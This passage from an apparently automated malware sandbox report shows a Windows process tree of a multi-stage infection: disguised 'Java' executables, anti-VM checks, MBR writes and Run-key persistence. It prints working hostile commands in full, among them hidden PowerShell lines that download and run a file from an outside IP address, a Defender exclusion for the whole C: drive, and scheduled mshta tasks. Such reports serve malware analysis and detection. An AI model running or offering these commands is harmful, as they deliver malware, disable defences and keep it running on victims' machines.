        System Location Discovery: System Language Discovery
        Suspicious use of SendNotifyMessage
        
        PID:2032
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3896
- - C:\Users\Admin\AppData\Local\Temp\10361780101\TbV75ZR.exe
    "C:\Users\Admin\AppData\Local\Temp\10361780101\TbV75ZR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3116
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      System Location Discovery: System Language Discovery
      PID:2492
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 488
        5⤵
        Program crash
        
        PID:3916
- - C:\Users\Admin\AppData\Local\Temp\10361790101\Rm3cVPI.exe
    "C:\Users\Admin\AppData\Local\Temp\10361790101\Rm3cVPI.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3580
- - C:\Users\Admin\AppData\Local\Temp\10361800101\xZRvIQ5.exe
    "C:\Users\Admin\AppData\Local\Temp\10361800101\xZRvIQ5.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:7092
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:4484
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:7080
- - C:\Users\Admin\AppData\Local\Temp\10361810101\u75a1_003.exe
    "C:\Users\Admin\AppData\Local\Temp\10361810101\u75a1_003.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:7116
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
      4⤵
      PID:6444
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4756
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      Downloads MZ/PE file
      Adds Run key to start application
      PID:4980
    - - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        5⤵
        Executes dropped EXE
        
        PID:5584
    - - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        5⤵
        Deletes itself
        Executes dropped EXE
        
        PID:2260
      - C:\Users\Admin\AppData\Local\Temp\{cac49f1a-6569-4ad2-98cc-57bb9562c18e}\36575e69.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{cac49f1a-6569-4ad2-98cc-57bb9562c18e}\36575e69.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        6⤵
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:8188
        
        C:\Users\Admin\AppData\Local\Temp\{fd9989c1-9e82-4819-a5b2-63078bff6123}\a28245d7.exe
        
        C:/Users/Admin/AppData/Local/Temp/{fd9989c1-9e82-4819-a5b2-63078bff6123}/\a28245d7.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        7⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Checks for any installed AV software in registry
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        NTFS ADS
        Suspicious behavior: LoadsDriver
        
        PID:7564
- - C:\Users\Admin\AppData\Local\Temp\10361820101\EPTwCQd.exe
    "C:\Users\Admin\AppData\Local\Temp\10361820101\EPTwCQd.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4992
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:4352
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1728
- - C:\Users\Admin\AppData\Local\Temp\10361830101\bot.exe
    "C:\Users\Admin\AppData\Local\Temp\10361830101\bot.exe"
    3⤵
    - Executes dropped EXE
    PID:976
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
      4⤵
      Executes dropped EXE
      PID:3516
    - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        5⤵
        Executes dropped EXE
        
        PID:6608
      - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        6⤵
        Executes dropped EXE
        
        PID:1520
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        7⤵
        Executes dropped EXE
        
        PID:6428
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        8⤵
        Executes dropped EXE
        
        PID:6796
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        9⤵
        Executes dropped EXE
        
        PID:1808
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        10⤵
        Executes dropped EXE
        
        PID:5200
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        11⤵
        Executes dropped EXE
        
        PID:7052
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        12⤵
        Executes dropped EXE
        
        PID:4856
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        13⤵
        Executes dropped EXE
        
        PID:6388
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        14⤵
        Executes dropped EXE
        
        PID:1344
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        15⤵
        Executes dropped EXE
        
        PID:7112
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        16⤵
        Executes dropped EXE
        
        PID:5940
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        17⤵
        Executes dropped EXE
        
        PID:4492
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        18⤵
        Executes dropped EXE
        
        PID:1500
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        19⤵
        Executes dropped EXE
        
        PID:1084
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        20⤵
        Executes dropped EXE
        
        PID:1408
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplugin_update.exe"
        21⤵
        Modifies registry key
        
        PID:9280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplugin_update.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe\"'"
        21⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        
        PID:3500
- - C:\Users\Admin\AppData\Local\Temp\10361840101\fd5d9b8176.exe
    "C:\Users\Admin\AppData\Local\Temp\10361840101\fd5d9b8176.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:13160
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10361840101\fd5d9b8176.exe"
      4⤵
      Downloads MZ/PE file
      System Location Discovery: System Language Discovery
      PID:12980
- - C:\Users\Admin\AppData\Local\Temp\10361850101\cf533b34eb.exe
    "C:\Users\Admin\AppData\Local\Temp\10361850101\cf533b34eb.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:6588
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10361850101\cf533b34eb.exe"
      4⤵
      Downloads MZ/PE file
      System Location Discovery: System Language Discovery
      PID:8148
- - C:\Users\Admin\AppData\Local\Temp\10361860101\4220f70f80.exe
    "C:\Users\Admin\AppData\Local\Temp\10361860101\4220f70f80.exe"
    3⤵
    - Suspicious use of SetThreadContext
    PID:7796
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5612
- - C:\Users\Admin\AppData\Local\Temp\10361870101\9ff7443f7f.exe
    "C:\Users\Admin\AppData\Local\Temp\10361870101\9ff7443f7f.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SendNotifyMessage
    PID:7956
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn UmbFjmam8Jo /tr "mshta C:\Users\Admin\AppData\Local\Temp\pVedJJdJJ.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1932
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn UmbFjmam8Jo /tr "mshta C:\Users\Admin\AppData\Local\Temp\pVedJJdJJ.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:9104
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\pVedJJdJJ.hta
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:1360
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'W9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        
        PID:9224
      - C:\Users\Admin\AppData\Local\TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE
        
        "C:\Users\Admin\AppData\Local\TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:10624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10361880121\am_no.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:10492
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 2
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:10544
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      PID:10792
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:10888
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      PID:10972
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:10960
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      PID:11108
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:11092
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn "leysBmanSh5" /tr "mshta \"C:\Temp\r7Zd9ek18.hta\"" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:11436
  - - C:\Windows\SysWOW64\mshta.exe
      mshta "C:\Temp\r7Zd9ek18.hta"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:11444
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        
        PID:11572
      - C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:12232

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3548

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3688

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3608

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:2788

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:5524

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4404

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2492 -ip 2492
1⤵
PID:6020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:6112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:6092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe"
1⤵
PID:5612
- C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
  2⤵
  - Executes dropped EXE
  PID:3784
- - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
    3⤵
    - Executes dropped EXE
    PID:7248
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
      4⤵
      Executes dropped EXE
      PID:7368
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        5⤵
        Executes dropped EXE
        
        PID:7412
      - C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice_service.exe"
        6⤵
        Modifies registry key
        
        PID:7452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe\"'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        
        PID:7516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe"
1⤵
PID:7684
- C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
  2⤵
  - Executes dropped EXE
  PID:7728
- - C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
    3⤵
    - Executes dropped EXE
    PID:7776
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
      4⤵
      Executes dropped EXE
      PID:7836
    - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        5⤵
        Executes dropped EXE
        
        PID:7884
      - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        6⤵
        Executes dropped EXE
        
        PID:7940
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        7⤵
        Executes dropped EXE
        
        PID:7984
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        8⤵
        Executes dropped EXE
        
        PID:8036
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        9⤵
        Executes dropped EXE
        
        PID:8076
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        10⤵
        Executes dropped EXE
        
        PID:8128
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        11⤵
        Executes dropped EXE
        
        PID:8180
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        12⤵
        Executes dropped EXE
        
        PID:8228
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        13⤵
        Executes dropped EXE
        
        PID:8260
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        14⤵
        Executes dropped EXE
        
        PID:8304
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        15⤵
        Executes dropped EXE
        
        PID:8352
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        16⤵
        Executes dropped EXE
        
        PID:8396
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        17⤵
        Executes dropped EXE
        
        PID:8432
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        18⤵
        Executes dropped EXE
        
        PID:8496
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        19⤵
        Executes dropped EXE
        
        PID:8528
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        20⤵
        Executes dropped EXE
        
        PID:8580
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        21⤵
        Executes dropped EXE
        
        PID:8640
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        22⤵
        Executes dropped EXE
        
        PID:8680
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        23⤵
        
        PID:8724
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        24⤵
        
        PID:8776
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        25⤵
        
        PID:8820
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        26⤵
        
        PID:8872
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        27⤵
        
        PID:8920
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        28⤵
        
        PID:8964
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        29⤵
        
        PID:9008
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        30⤵
        
        PID:9064
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        31⤵
        
        PID:9108
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        32⤵
        
        PID:9156
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        33⤵
        
        PID:9208
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        34⤵
        
        PID:9260
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        35⤵
        
        PID:9312
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        36⤵
        
        PID:9360
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        37⤵
        
        PID:9404
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplatformw.exe"
        38⤵
        Modifies registry key
        
        PID:9444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplatformw.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe\"'"
        38⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        
        PID:9500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe"
1⤵
PID:9644
- C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
  2⤵
  PID:9704
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
    3⤵
    PID:9744
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
      4⤵
      PID:9792
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        5⤵
        
        PID:9844
      - C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        6⤵
        
        PID:9888
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        7⤵
        
        PID:9944
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        8⤵
        
        PID:9988
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        9⤵
        
        PID:10044
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplugin_service.exe"
        10⤵
        Modifies registry key
        
        PID:10080
        
